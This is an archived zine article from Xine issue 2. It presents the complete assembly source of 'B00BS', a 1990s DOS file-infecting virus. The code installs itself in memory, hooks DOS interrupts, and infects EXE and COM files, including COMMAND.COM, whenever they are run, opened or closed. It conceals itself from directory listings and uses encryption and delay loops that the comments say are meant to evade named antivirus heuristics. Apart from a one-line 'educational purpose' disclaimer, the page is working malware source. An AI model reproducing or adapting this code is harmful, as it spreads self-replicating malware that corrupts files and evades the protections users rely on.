Copy Link
Add to Bookmark
Report

xine-2.029

eZine's profile picture
Published in 
Xine
 · 1 year ago

 
/-----------------------------\
| Xine - issue #2 - Phile 029 |
\-----------------------------/

;******************************************************************************
; THIS IS FOR EDUCATIONAL PURPOSE ONLY Gi0rGeTt0
;
; Virus name : B00BS
; Author : Unknwon :)
; Group : iKx
; Origin : Italy 1996/97
; Compiling : Use TASM
; TASM /M2 B00BS.ASM
; TLINK B00BS
; Targets : EXE COM
; Features : stealth via 11h,12h,4eh,4fh,disinfect and infect on the fly
; on opening(3dh,6c00h) and closing(3eh) ,int 24h handler
; TSR by MCB and int21h (48h)
; uses some 386 instructions for some routines (just for fun)
; fucks TBAV,AVP,F-PROT heuristic shits
; improvements : needs a poly engine
; payload : none
; Greetings : to all the guys of the iKx and all the
; other guys on #virus.
;
;******************************************************************************
;flflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflflfl
; The file is a EXE


.386

CSeg SEGMENT USE16

ASSUME cs:CSeg

FileHeaderRecord struc
signature dw ?
sizemod dw ?
msize dw ?
relocat dw ?
headsize dw ?
minalloc dw ?
maxalloc dw ?
stackseg dw ?
stackofs dw ?
check dw ?
ip dw ?
codes dw ?
Checksum dw ?
checkOvr dw ?

FileHeaderRecord ends

SearchRecord struc
date dw ?
time dw ?
SearchRecord ends

ExecBlockRecord struc
Env dw ?
Cmd dd ?
ExecBlockRecord ends

Findrecord struc
FindBuf db 128 dup (?)
Findofs dw ?
Findrecord ends

VIR_PAR = ((END_TSR - START_TSR ) / 16) + 2
VIR_LEN = (REAL_CODE - START_TSR) + 1 ; dim virus in memoria
VIR_TRUE_LEN = ( REAL_CODE - START_TSR ) + 1 ; dimensione del virus su file


already = 0 ; already infected
ready = 1 ; ready to be infected
com = 2 ; com file
exe = 3 ; exe file
other = 4 ; other

true = 1
false = 0

maxfiles = 26 ; max file no to open , must be (maxfiles*2)/4 integer

START_TSR equ $

AfterCryp : call SH
SH : pop bp
sub bp,3

push ds
pop es

mov ax,0fe01h
int 2fh

cmp al,0ffh
jne short Novirus

YesVirus : db 0e9h
jmp_addr dw ?

mov ax,ds ; ES = DS = PSP = AX
add ax,10h ; PSP + 1 paragraph
mov bx,cs:[bp][templateheader.stackseg]
add bx,ax
cli
mov ss,bx
mov sp,cs:[bp][templateheader.stackofs]
sti

mov bx,cs:[bp][templateheader.codes]
add bx,ax

push bx ; push CS
push cs:[bp][templateheader.ip] ; push IP

@jump : xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
xor esi,esi
xor edi,edi
xor ebp,ebp

retf ; jmp to host CS:IP

com_exec : push cs ; COM settings
mov si,bp
add si,offset @com_buf
mov di,100h
push di
cld
movsd
jmp short @jump


NoVirus : mov es,word ptr ds:[2ch] ; enviroment segment
mov word ptr cs:[bp][tmp_COMseg],es

push ds

mov ax,ds ; DS = PSP
dec ax ; AX = MCB
mov ds,ax

mov bl,02h ; last fit
mov ax,5801h
int 21h ; set

mov bx,VIR_PAR ; malloc
mov ah,48h
int 21h
jnc short malloc ; problems ?

push ax dx
mov ah,2
mov dl,7
int 21h
pop dx ax

push ds
pop ax

mov bx,4d03h
mov ds:[0],bh ;'M'
xor bh,bh
sub word ptr ds:[bx],VIR_PAR
inc ax
add ax,ds:[bx]
mov ds,ax
mov word ptr ds:[bx],VIR_PAR-1
mov bl,'Z'
mov ds:[0],bl ; Z in last MCB

inc ax

malloc : mov es,ax

dec ax
push ax
pop ds

mov bx,8
mov ds:[1],bx ; owned by dos 0008
mov word ptr ds:[bx],'CS'

xor bl,bl ; restore strategy
mov ax,5801h
int 21h

cld
xor di,di
mov si,bp
push cs
pop ds
mov cx,(VIR_LEN / 4) + 1
rep movsd

call clean_x_stack

cli

xor ax,ax
mov ds,ax

mov eax,es
shl eax,16
mov ax,offset HOOK_21
xchg ds:[84h],eax
mov es:TRAPPED_21,eax

mov eax,es
shl eax,16
mov ax,offset HOOK_2F
xchg ds:[0bch],eax
mov es:TRAPPED_2F,eax

pop ds ; DS = PSP

mov es:sleep,FALSE
mov es:command_Flag,TRUE
mov ax,cs:[bp][tmp_COMseg]
mov es:COMseg,ax

push ds
pop es

sti

jmp yesvirus

tmp_COMseg dw ?

HOOK_2F : cmp ah,0feh
jne short ChkintWin
mov al,0ffh
iret

;///// Chkintwin and ChkEndwin disable the virus during installation check in
; win311 and under Msdos prompt in w95 /////

; Under Msdos prompt only some int21h trap worked :(( i.e 4b
; but 3dh,3eh and some other as all long filenames functions didn't work
; i dunno the reason since i hadn't much time for solving the question
; if someone can explain it let me know pleaze :)

ChkintWin : cmp ax,1605h
jne short chkendwin
mov cs:sleep,TRUE
jmp short pass2f

ChkEndWin : cmp ax,1606h
jne short pass2f
mov cs:sleep,FALSE

pass2f : db 0eah
TRAPPED_2F dd ?

HOOK_21 : cmp cs:command_flag,TRUE
jne short Check_int
call @COMM_COM

Check_int : cmp cs:sleep,TRUE
je short org_21

cmp ax,cs:[intr_sub_w] ;4b00h
je @EXEC00
cmp ax,cs:[intr_sub_w+2] ;4b01h
je @LD&EX

cmp ah,cs:[intr_sub_b] ;1ah
je @SAVEDTA
cmp ah,cs:[intr_sub_b+1] ;4eh
je @FINDFIRST
cmp ah,cs:[intr_sub_b+2] ;4fh
je @FINDNEXT

cmp ah,cs:[intr_sub_b+3] ;3dh
je @OPEN
cmp ah,cs:[intr_sub_b+4] ;3eh
je @CLOSE

cmp ax,cs:[intr_sub_w+4] ;6c00h
je @EXTOPEN

cmp ah,cs:[intr_sub_b+5] ;11h
je @FCB_FIND
cmp ah,cs:[intr_sub_b+6] ;12h
je @FCB_FIND


org_21 : db 0eah
TRAPPED_21 dd ?

@COMM_COM : pushad
push ds es

cld
mov ax,cs:COMseg
mov es,ax
xor di,di
mov cx,256

@pre_loop : mov eax,'SMOC'
@loop_a : scasd
jz short @nxt_ck
sub di,3
loop @loop_a

jmp @fail

@nxt_ck : mov eax,'=CEP'
scasd
jz short @it_is
sub di,3
jmp short @pre_loop

@it_is : push es
pop ds
mov si,di
push cs
pop es
mov di,offset Data_Buffer

mov cx,256

@loop_b : lodsb
or al,al
jz short @copy_end
stosb
loop @loop_b
@copy_end : stosb

push cs
pop ds
mov dx,offset Data_Buffer ; DS:DX command.com path
mov bx,dx

call GetFattrib ; CX attributo
jc short @fail

push cx dx ds

call openfile ; BX handle

call FileInfect

call closefile

pop ds dx cx

call SetFattrib

@fail : pop es ds
popad

mov cs:command_flag,FALSE

ret

@EXEC00 : call CheckIfExe
jnz org_21

pushad
push es ds ; DS:DX ASCIZ filename

call vir_handler

call getFattrib
jc short @no_inf ; CX attributo

push cx ds dx

call openfile

call FileInfect

call closefile

pop dx ds cx

call SetFattrib

@no_inf : call dos_handler

pop ds es
popad

call int21h

jmp Intret


@LD&EX : push es ds
pushad

call vir_handler

call GetFattrib
jc short ex_ld ; CX attributo

push cx dx ds

call OpenFile
jc short ex_ld

call FileClean

call closefile

pop ds dx cx

call SetFattrib

ex_ld : call dos_handler

popad
pop ds es

push ds dx
call int21h
pop dx ds

pushf
push es ds
pushad

call vir_handler

call GetFattrib
jc short not_ld ; CX attrib

push cx ds dx

call OpenFile

call FileInfect

call closefile

pop dx ds cx

call SetFattrib

not_ld : call dos_handler

popad
pop ds es
popf
jmp Intret


@OPEN : call CheckIfExe
jnz org_21

push es ds
pushad

call vir_handler

call GetFattrib
jc short Skip_file ; CX attrib

push cx ds dx

call OpenFile

call FileClean

call CloseFile

pop dx ds cx

call SetFattrib

call dos_handler

popad
pop ds es

push ds dx
call int21h
pop dx ds
jc short @no_open

xchg ax,bx
call PushHandle
xchg bx,ax
jmp Intret

@no_open : pushf
cmp al,5
jne short @no_mat

push es ds
pushad

call vir_handler

call GetFattrib
jc short @a

push cx ds dx

call OpenFile

call FileInfect

call CloseFile

pop dx ds cx

call SetFattrib

call dos_handler

@a : popad
pop ds es

@no_mat : popf
jmp Intret

Skip_file : popad
pop ds es

call dos_handler

jmp org_21

@EXTOPEN : xchg si,dx
call CheckIfExe
xchg dx,si
jnz org_21

push es ds
pushad

call vir_handler

mov dx,si

call GetFattrib
jc short @aa

push cx ds dx

call OpenFile

call FileClean

call closefile

pop dx ds cx

call SetFattrib

@aa : call dos_handler

popad
pop ds es

push ds si
call int21h
pop dx ds
jc @no_open

xchg ax,bx
call PushHandle ; save handle
xchg bx,ax

jmp Intret


; // SFT and JFT didn't work in Msdos Prompt :(( //

@CLOSE : call Pophandle
jc org_21

call vir_handler

pushad
push ds es

push bx

mov ax,1220h ; BX handle
call int2fh ; ES:DI JFT

xor bx,bx
mov bl,byte ptr es:[di]
mov ax,1216h ; bx entry number for
call int2fh ; ES:DI SFT

mov byte ptr es:[di+2],2

pop bx

call FileInfect

pop es ds
popad

call int21h ; exec int

call dos_handler

clc
jmp Intret


@FINDFIRST : push ax cx si di es ; DS:DX find filename
pushf

mov si,dx

push cs
pop es
mov di,offset findvar

cld
push di
xor ax,ax
mov cx,(size Findvar - 2) / 2
rep stosw ; reset Findvar
pop di

mov ah,60h ; DS:SI filename
call Int21h ; ES:DI canonaized

mov di,offset findvar + size findvar - 2
mov cx,size findvar - 2 - 1

std
mov al,'\'
repnz scasb
jz short o
sub di,3
o : add di,2
mov cs:Findvar.Findofs,di
popf
pop es di si cx ax

@FINDNEXT : call int21h
jc Intret

FindProc : pushad
push ds es
pushf

mov ds,cs:DTAseg
mov si,cs:DTAofs
add si,1eh ; DS:SI punta al
; filename nella DTA
push cs
pop es

mov di,cs:findvar.findofs ; ES:DI path filename
cld

CopyName: movsb
cmp byte ptr ds:[si],0
jne short CopyNAme
mov byte ptr es:[di],0

; Findvar now has the ASCIZ filename to pass to Openfile

push cs
pop ds
mov dx,offset Findvar

call CheckIfExe
jnz short DonotTreat

call OpenFile
jc short DoNotTreat

call CheckXinf

cmp file_type,other
je short CanClose

cmp file_status,already
jne short CanClose

mov es,DTAseg
mov di,DTAofs

sub dword ptr es:[di+1ah],vir_true_len - 1

CanClose : call CloseFile

DoNotTreat: popf
pop es ds
popad
jmp Intret


@SAVEDTA : mov cs:DTAofs,dx
mov cs:DTAseg,ds
jmp org_21


@FCB_FIND : call int21h

pushf
push es ax bx

les bx,dword ptr cs:DTAofs

mov al,byte ptr es:[bx]
cmp al,0ffh ; vede se FCB esteso
jne short @ok_good
add bx,7

@ok_good : pusha
push ds es

mov ah,47h ; get cur dir
mov dl,byte ptr es:[bx] ; drive number
push cs
pop ds
mov si,offset FindVar
call int21h ; return ASCIZ directory

push cs
pop es
cld

cmp byte ptr ds:[si],0 ; root ?
jne short @path
mov ax,offset FindVar
add ax,3
mov cs:FindVar.FindOfs,ax
jmp short @root

@path : mov di,offset FindVar
xor al,al
@@f : scasb ; look for the end of the dirname
jnz short @@f

mov si,di
dec si
mov byte ptr es:[si],'\'
add di,3

mov es:FindVar.FindOfs,di
dec di
std
@cp : movsb
cmp si,offset FindVar
jae short @cp

@root : mov word ptr es:[offset FindVar+1],'\:'
add dl,'A' - 1
mov byte ptr es:[offset FindVar],dl ; drive letter

pop es ds
popa

pusha
push ds es ; ES:BX DTA

push es
pop ds ; DS = ES
mov si,1
add si,bx ; file name ds:si

push cs
pop es
mov di,cs:FindVar.FindOfs

mov cx,8
cld

@lp1 : lodsb
cmp al,20h
je short @end_1
stosb
loop @lp1

@end_1 : mov al,'.'
stosb

mov cx,3
mov si,9
add si,bx
rep movsb

xor al,al
stosb ; Z terminated

push cs
pop ds
mov dx, offset FindVar ; ASCIZ filename

mov bp,bx

call CheckIfExe
jnz short @not_op

call OpenFile
jc short @not_op

call CheckXinf

cmp file_type,other
je short @CanClose

cmp file_status,already
jne short @CanClose

mov es,cs:DTAseg
sub dword ptr es:[bp+1dh],VIR_TRUE_LEN - 1 ; real size

@CanClose : call CloseFile

@not_op : pop es ds
popa


@NotInf : pop bx ax es
popf

Intret proc
cli
push ax
pushf
pop ax
add sp,8
push ax
sub sp,6
pop ax
sti
iret
Intret endp


int21h proc

pushf
call dword ptr cs:TRAPPED_21
ret

int21h endp

int2fh proc

pushf
call dword ptr cs:TRAPPED_2F
ret

int2fh endp

vir_handler proc

cli
push eax ds
xor ax,ax
mov ds,ax
mov eax,cs
shl eax,16
mov ax,offset critical
xchg ds:[90h],eax
mov cs:TRAPPED_24,eax
pop ds eax
sti
ret

vir_handler endp

dos_handler proc

push ds ax
cli
xor ax,ax
mov ds,ax

db 66h
dw 06c7h
dw 0090h
TRAPPED_24 dd ? ; mov ds:[90h],cs:TRAPPED_24

pop ax ds
sti
ret

dos_handler endp


critical proc
xor al,al
iret
critical endp


openfile proc

mov ah,3dh
xor al,al
add al,2
; mov ax,3d02h
call int21h
mov bx,ax
ret ; out : BX handle

openFile endp

closeFile proc

mov ah,3eh ; in : BX handle
call int21h
ret

closefile endp

GetFAttrib proc

push ax
mov ah,43h
xor al,al
; mov ax,4300h
push ax
call int21h ; CX attributo
pop ax
inc al
push cx
; mov ax,4301h
push ax
call int21h
pop ax
jc short out_f
; mov ax,4301h
mov cx,32
call int21h
out_f : pop cx
pop ax ; ritorna CX attributo
ret ; ritona carry se errore

SetFattrib proc
push ax ; in CX attributo
mov ah,43h
xor al,al
inc al
; mov ax,4301h
call int21h
pop ax
ret
SetFattrib endp

GetFAttrib endp

FileEnd proc
mov ah,42h
xor al,al
add al,2
; mov ax,4202h
xor cx,cx
xor dx,dx
call int21h ; DX:AX file size
ret

FileEnd endp

Filestart proc

xor cx,cx
xor dx,dx

Filestart endp

FileSeek proc

mov ax,4200h
call int21h
ret

FileSeek endp

blockread proc

mov ah,3fh
call int21h
ret

blockread endp

blockwrite proc

mov ah,40h
call int21h
ret

blockwrite endp

GetDateTime proc

mov ah,57h
xor al,al
; mov ax,5700h
call Int21h
mov cs:searchrec.date,dx
mov cs:searchrec.time,cx
ret

GetdateTime endp

SetDateTime proc

mov dx,cs:searchrec.date
mov cx,cs:searchrec.time
mov ah,57h
xor al,al
inc al
; mov ax,5701h
call Int21h
ret

SetdateTime endp

commit_file proc

mov ah,68h
call int21h ; commit file
ret

commit_file endp

clean_x_stack proc

mov di,offset searchstack
mov cx, (size searchstack) / 4
xor eax,eax
rep stosd
ret

clean_x_stack endp


CheckIfExe proc ; DS:DX filename

push es di ax

push ds
pop es

cld
mov di,dx ; ES:DI filename
xor ax,ax
FindZ : scasb
jnz short FindZ

cmp dword ptr [di-5],'exe.'
je short is_exe
cmp dword ptr [di-5],'EXE.'
je short is_exe
cmp dword ptr [di-5],'moc.'
je short is_exe
cmp dword ptr [di-5],'MOC.'

is_exe : pop ax di es
ret

CheckIfExe endp

PushHandle proc

pushf
push ax cx es di

push cs
pop es
mov di,offset SearchStack ; ES:DI SearchStack
cld
mov cx,maxfiles
xor ax,ax
repnz scasw
jnz short Nofree
mov word ptr es:[di-2],bx ; sets handle

Nofree: pop di es cx ax
popf
ret

PushHandle endp

PopHandle proc

push ax cx es di

or bx,bx
jz short Nofree1 ; BX = 0 ?

push cs
pop es

cld
mov di,offset SearchStack
mov cx,maxfiles
mov ax,bx
repnz scasw
jnz short Nofree1
mov word ptr es:[di-2],0 ; free handle
clc
jmp short exitpop

Nofree1 : stc
Exitpop : pop di es cx ax
ret

PopHandle endp


Calc_check proc

push si ; DS = CS

xor dx,dx
mov si,size fileheader - 4
@chk : add dx,[si+offset fileheader]
sub si,2
jnz short @chk

pop si ; DX = checksum
ret

Calc_check endp

CheckXinf proc

mov file_status,already

call Filestart

mov cx,size Fileheader
mov dx, offset Fileheader
call BlockRead

mov cx,cs:[MZsig]
dec cx
cmp fileheader.signature,cx
je short IsanExe
mov cx,cs:[ZMsig]
dec cx
cmp fileheader.signature,cx ; vede se e' un file EXE
je short IsanExe

mov file_type,com

call FileEnd ; DX:AX dim file

sub ax,VIR_TRUE_LEN - 1
add ax,NONCRYPTED - START_TSR
sub ax,3

cmp ax,word ptr fileheader.signature+1
je GotoEnd ; infected

jmp Except

IsAnExe : mov file_type,exe

cmp fileheader.Checksum,40h
jne short @good ; not a PE,NE,LE ....
mov file_type,other
jmp GotoEnd

@good : call calc_check

cmp dx,fileheader.CheckOvr
je GoToEnd ; already infected

Cont : call FileEnd ; DX:AX dimens file

shl edx,16
mov dx,ax

movzx edi,fileheader.msize
movzx esi,fileheader.sizemod
dec edi
imul edi,512
add edi,esi

cmp edi,edx ; malloc = filesize
je short Except

;//**** SFT and JFT doesnt work in dos7 prompt from w95 :(( ****** ///
;//**** This is used for infecting COMMAND.COM under dos7 which is not a .COM
;//**** file but a real EXE

Chk_Com : push bx es

mov ax,1220h ; BX handle
call int2fh ; ES:DI JFT

xor bx,bx
mov bl,byte ptr es:[di]
mov ax,1216h ; bx entry number for
call int2fh ; ES:DI SFT

cld
add di,20h ; go to filename

mov eax,'MMOC'
scasd
jnz short no_com_com
mov eax,' DNA'
scasd
jnz short no_com_com
mov ax,'OC'
scasw
no_com_com : pop es bx
jz short except

mov file_type,other
jmp short GotoEnd

except : mov file_status,ready

GoToEnd : call FileEnd
ret
; DX:AX dimensione file
CheckXinf endp


FileInfect proc

push cs cs
pop ds es

call CheckXInf ; DX:AX dimens file

cmp file_type,other
je Infectexit

cmp file_status,ready
jne infectexit

cld
mov word ptr f_size,ax ; salva dim per .COM
mov si,offset fileheader
mov di,offset @com_buf
movsd

cmp dx,0
ja short @not_less

cmp ax,23000
ja short @not_less

jmp infectexit

@not_less : cmp dx,7
ja Infectexit

cld
mov si,offset fileheader + 2
mov di,offset templateheader + 2
mov cx,(size fileheader) / 2 - 1
rep movsw

push ax dx
add ax,VIR_TRUE_LEN
adc dx,0
mov cx,512
div cx

inc ax ; AX = quoziente DX=resto
mov fileheader.msize,ax ; nuova memory size
mov fileheader.sizemod,dx ; nuovo memory module
pop dx ax

add ax,NONCRYPTED - START_TSR
adc dx,0

mov cx,16
div cx ; AX:DX = CS:IP

mov fileheader.ip,dx

push ax

xor dx,dx
mov ax,VIR_TRUE_LEN
add ax,cx
add fileheader.ip,ax
mov cx,16
div cx

sub fileheader.ip,dx

mov dx,fileheader.ip

dec dx
mov first_addr,dx
sub dx,NONCRYPTED - START_TSR
mov cmp_addr,dx

mov dx,ax

pop ax

sub ax,dx

sub ax,fileheader.headsize
mov fileheader.codes,ax ; setta CS:IP nuovi
mov fileheader.stackseg,ax
add fileheader.stackofs,(VIR_PAR + 4) * 16 ; mi metto al sicuro

call GetDateTime

call calc_check ; dx checksum
mov fileheader.checkovr,dx

LeaveSo : call FileStart

cmp file_type,com
jne @exe1

mov jmp_addr,offset com_exec - offset yesvirus - 3

mov byte ptr fileheader,0e9h
mov cx,f_size
add cx,NONCRYPTED - START_TSR
sub cx,3
mov word ptr fileheader+1,cx
add cx,102h
mov first_addr,cx
sub cx,NONCRYPTED - START_TSR
mov cmp_addr,cx

mov dx,offset FIleheader
mov cx,3
call BlockWrite

jmp short ordinary

@exe1 : mov jmp_addr,0

mov dx,offset Fileheader
mov cx,size fileheader
call BlockWrite ; scrive header

ordinary : call FileEnd

call Criptate ; return CX =
; virus lenght
mov dx,offset Data_Buffer
mov cx,VIR_TRUE_LEN - 1
call BlockWrite

call SetDateTime

call commit_file

InfectExit : ret

FileInfect endp

FileClean proc

push cs
pop ds

call CheckXInf ; DX:AX dimens file

cmp file_type,other
je clean_out

cmp file_status,already
jne clean_out

sub ax,size templateheader + 4 ;size @com_buf
sbb dx,0

mov cx,dx
mov dx,ax
call FileSeek

mov cx,size templateheader + 4 ;size @com_buf
; read real fileheader
mov dx,offset @com_buf
call Blockread

call FileStart
call GetdateTime

cmp file_type,com
jne short @exe2

mov cx,4
mov dx,offset @com_buf
call Blockwrite
jmp short ordinary1

@exe2 : mov cx,cs:[MZsig]
dec cx
mov templateheader.signature,cx
mov dx,offset templateHeader
mov cx,size templateheader
call BlockWrite

ordinary1 : call fileEnd

sub ax,vir_true_len - 1
sbb dx,0

mov cx,dx
mov dx,ax
call FileSeek

xor cx,cx
call Blockwrite

call SetDateTime

call commit_file

clean_out : ret

FileClean endp

Criptate proc

push bx

xor bx,bx
mov ds,bx
mov bx,word ptr ds:[46ch] ; ritorna numero casuale

push cs cs
pop ds es

mov k_code,bl
mov k1_code,bl

mov si,bx
and si,3
cmp si,3
jl short @well
xor si,si

@well : mov bh,byte ptr [offset cripstyle+si]
mov cripmode,bh
mov bh,byte ptr [offset uncripstyle+si]
mov uncripmode,bh

std
mov si,offset NONCRYPTED - 1
mov di,offset Data_Buffer + (NONCRYPTED - START_TSR) - 1
@crip : bt si,15
jc short @stop
lodsb

cripmode db ?
k_code db ? ; xor add sub ,k_code

stosb
jmp short @crip

@stop : cld
mov si,offset @uncr_code
mov di,offset offset Data_Buffer + (NONCRYPTED - START_TSR)
mov cx,REAL_CODE - offset @uncr_code
rep movsb

pop bx

ret
Criptate endp

Cripstyle db 034h ; xor
db 04h ; add
db 02ch ; sub

Uncripstyle db 34h ; xor
db 2ch ; sub
db 04h ; add

Message db '|||-(BOOBS-)||| Virus , Once again deep in Terronia Land '
db '1997 Bari'

intr_sub_w dw 4b00h,4b01h,6c00h
intr_sub_b db 1ah,4eh,4fh,3dh,3eh,11h,12h
MZsig dw 'ZM'+1
ZMsig dw 'MZ'+1

NONCRYPTED equ $

@uncr_code : db 0beh
first_addr dw ? ; mov si,first_addr

@uncr : db 02eh ; xor cs:[si]
db 80h
uncripmode db ?
k1_code db ?

mov cx,4000 ; do-nothing loop
@m1: inc si ; to waste time
dec si ; to
loop @m1 ; fuck AVP

dec si
db 81h
db 0feh
cmp_addr dw ? ; cmp si,

jne short @uncr

@end : jmp AfterCryp

@com_buf db 4 dup (?)
templateheader FileheaderRecord <> ; real file header

REAL_CODE equ $

Fileheader FileheaderRecord <> ; header
file_status db ? ; infection flag
file_type db ?
sleep db ? ; flag for Windows 3.X
command_flag db ? ; infect command.com ?
Searchrec Searchrecord <> ; date & time record
SearchStack dw Maxfiles dup (?) ; stack for f-handle
FindVar Findrecord <> ; findfirst & findnext
SFT db 03bh dup (0) ; System File Table Buffer
DTAofs dw ? ; DTA for Findfirst,next
DTASeg dw ?
COMSeg dw ? ; SEG for command.com
f_size dw ? ; com size
Data_Buffer db VIR_TRUE_LEN + 16 dup (?) ; Virus temp buffer


END_TSR equ $


main : mov ax,ds ; DS = PSP
dec ax ; AX = MCB
mov ds,ax

mov byte ptr ds:[0],'M'
sub word ptr ds:[3],VIR_PAR
inc ax
add ax,ds:[3]
mov ds,ax
mov byte ptr ds:[0],'Z' ; Z nell'ultimo MCB
mov word ptr ds:[1],0008
mov word ptr ds:[3],VIR_PAR-1
mov word ptr ds:[8],'CS'

inc ax ; SEG TSR

cld
mov es,ax
xor si,si
xor di,di
push cs
pop ds
mov cx,(VIR_LEN / 4) + 1
rep movsd

call clean_x_stack

cli

xor ax,ax
mov ds,ax

mov eax,es
shl eax,16
mov ax,offset HOOK_21
xchg ds:[84h],eax
mov es:TRAPPED_21,eax

mov eax,es
shl eax,16
mov ax,offset HOOK_2F
xchg ds:[0bch],eax
mov es:TRAPPED_2F,eax

mov es:sleep,FALSE
mov es:command_flag,FALSE

sti

mov ax,4c00h
int 21h
CSeg ends
end main

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT